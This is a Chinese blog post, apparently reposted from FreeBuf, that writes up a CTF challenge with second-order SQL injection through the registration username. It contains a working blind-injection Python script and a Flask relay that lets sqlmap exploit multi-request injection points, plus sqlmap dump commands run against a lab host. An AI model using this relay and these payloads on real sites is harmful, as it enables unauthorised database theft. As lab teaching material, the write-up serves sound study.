SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx

前言

在渗透工作中我们经常能碰到一些逻辑复杂的SQL注入漏洞,并不能直接通过sqlmap工具注入拿到结果。今年网鼎杯的一道SQL注入题“张三的网站”让我久久不能忘怀,我不断思考遇到这类型的SQL注入除了手工注入然后编写脚本一点一点脱数据以外,有没有一个比较优雅的解决方案呢?

一道CTF题的思考

先来说说“张三的网站”这道题目,因为我手上没有题目源码,所以就根据记忆中的各个功能自己写了一个(很少写php,代码很烂),相关代码已经上传到GitHub,见文章底部。
该题目主要涉及3个页面:

  1. 登陆页面
    图片[1]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科
  2. 注册页面图片[2]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科
  3. 登陆后的主页图片[3]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科

题目中的登陆页面、注册页面均无SQL注入漏洞,但是登陆后的主页在用户名处存在SQL注入漏洞。要利用此漏洞,需要在注册页面控制用户名,邮箱使用随机数生成的邮箱,密码随意,然后使用邮箱和注册时的密码登陆,登陆成功后跳转到主页,此时触发SQL注入漏洞。
注册名为“123”的用户:

图片[4]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科

图片[5]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科图片[6]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科

注册名为“123’”的用户:

图片[7]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科

 

图片[8]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科

以下是一个Python脚本手工注入的解法:

import requests
import random
import re
import string

proxy = {'http': '127.0.0.1:8080'}
session = requests.session()


def register(username, email, password='123'):
    burp0_url = "http://192.168.154.130:80/web/register.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
    r = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)


def login(email, password='123'):
    burp0_url = "http://192.168.154.130:80/web/login.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"email": email, "pw": password, "submit": ''}
    r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
    # 跳转首页
    burp0_url = "http://192.168.154.130/web/index.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Referer": "http://a434051f6c184741b1ede6b610a15f805a546b5b172748e9.changame.ichunqiu.com/login.php", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    
    r2 = session.get(burp0_url, headers=burp0_headers, proxies=proxy)
    if r2.status_code == 302:
        print('username payload no work')
    elif r2.status_code == 200:
        pattern = '''<span class="user-name">(.+?)</span>'''
        try:
            userr = re.findall(pattern, r2.text, re.DOTALL)[0]
            if userr:
                return True
            else:
                return False
        except:
            return False




def main():
    key = string.ascii_lowercase + string.digits + '{}_-'
    flag = ''
    for keynum in range(1, 43):
        for s in key:
            username = r"""'or(substr((select e.a from (select (select 1)a union select * from flag)e limit 2 offset 1) from {0} for 1) = '{1}') and '1""".format(keynum, s)
            email = '{}@qq.com'.format(int(random.random() * 10000000))
            register(username, email)
            if login(email):
                flag += s
                print('key: ' + flag)
                break
       
    
if __name__ == "__main__":
    main()

如果对ctf不熟悉的朋友应该会很懵,因为语句中直接查询获取了flag表中的内容,而正常情况下,我们是不知道真正的flag在上面表,这样的解法我个人觉得不具备通用性,当然了在ctf比赛中是很高效的。

那么,有没有可能通过sqlmap来进行注入呢?显然,直接使用sqlmap不进行二次开发是无法检测出注入点的,因为sqlmap的注入逻辑不支持多个数据包的逻辑处理。于是我在想有无一种办法,拿到sqlmap的注入检测payload,然后我们通过Python编写相应的请求逻辑,再把响应结果返回到sqlmap呢?答案是可行的!

Flask中转sqlmap注入

代码实现的结构如下,首先创建一个flask服务,接收payload参数的值,然后传入函数custom_fun中,custom_fun函数由自己编写请求逻辑,把payload参数的值填入到存在注入点的参数中,然后发起请求,把最终响应结果return就行。最后通过sqlmap检测URL:http://127.0.0.1:5000/?payload=1即可,可以适当调整sqlmap的注入参数,比如–level、–risk、–technique等。

from flask import Flask
from flask import request
import requests
import random

def custom_fun(payload):
    return ''

app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'GET':
        payload = request.args.get('payload')
    elif  request.method == 'POST':
        payload = request.form.get('payload')
    return custom_fun(payload)

def main():
    app.run(host='127.0.0.1', debug=True)


if __name__ == "__main__":
    main()

流程示意图如下:

图片[9]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科

完整注入过程

先来看看本例的实现代码:

from flask import Flask
from flask import request
import requests
import random


def custom_fun(payload):
    email = '{}@qq.com'.format(int(random.random() * 10000000))
    username = payload
    password = '123'
    proxy = {'http': '127.0.0.1:8080'}
    session = requests.session()
    # 注册
    burp0_url = "http://192.168.154.130:80/web/register.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/register.php", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"name": username, "pw": password, "repw": password, "email": email, "submit": ''}
    resp = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
    # 登陆
    burp0_url = "http://192.168.154.130:80/web/login.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.154.130", "Connection": "close", "Referer": "http://192.168.154.130/web/login.php", "Upgrade-Insecure-Requests": "1"}
    burp0_data = {"email": email, "pw": password, "submit": ''}
    r1 = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxy)
    # 登陆后跳转到首页
    burp0_url = "http://192.168.154.130/web/index.php"
    burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    
    resp = session.get(burp0_url, headers=burp0_headers, proxies=proxy)    
    resp.encoding = resp.apparent_encoding
    return resp.text

app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
    if request.method == 'GET':
        payload = request.args.get('payload')
    elif  request.method == 'POST':
        payload = request.form.get('payload')
    return custom_fun(payload)



def main():
    app.run(host='127.0.0.1', debug=True)


if __name__ == "__main__":
    main()

从代码上可以看到,只需要把请求逻辑写到custom_fun函数中,把最终结果的响应包return给flask,剩下的就可以交给sqlmap了,优雅!

这里说一个小技巧,可以使用Burp的拓展Copy As Python-Requests来一键把burp的请求复制为Python requests请求:

图片[10]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科

图片[11]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科

然后使用sqlmap测试一下,因为是通过本地flask中转,我们的sqlmap的target应该是本地的flask服务端口,命令如下:
sqlmap -u http://127.0.0.1:5000/?payload=1
检测时flask服务的输出:

图片[12]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科

成功检测到注入点:

图片[13]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科当前数据库:
sqlmap -u http://127.0.0.1:5000/?payload=1 –current-db

图片[14]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科跑表名:
sqlmap -u http://127.0.0.1:5000/?payload=1 -D test –tables

图片[15]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科跑flag表数据:
sqlmap -u http://127.0.0.1:5000/?payload=1 -D test -T flag –dump

图片[16]-SQL注入进阶-Flask中转SQLMAP案例 – 作者:r0yanx-安全小百科

小结

Flask中转sqlmap注入并非本人原创,互联网上已有前辈发表过相关的案例,这里以一个ctf题目作为案例,来更加优雅地进行SQL注入。挖洞是不可能挖洞的,这辈子都不可能挖洞的,手工注入又不会,只能靠sqlmap,才能维持得了生活这样子…

测试环境代码:
GitHub:https://github.com/ryanInf/fakeZhangSan

来源:freebuf.com 2020-07-21 11:35:04 by: r0yanx

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论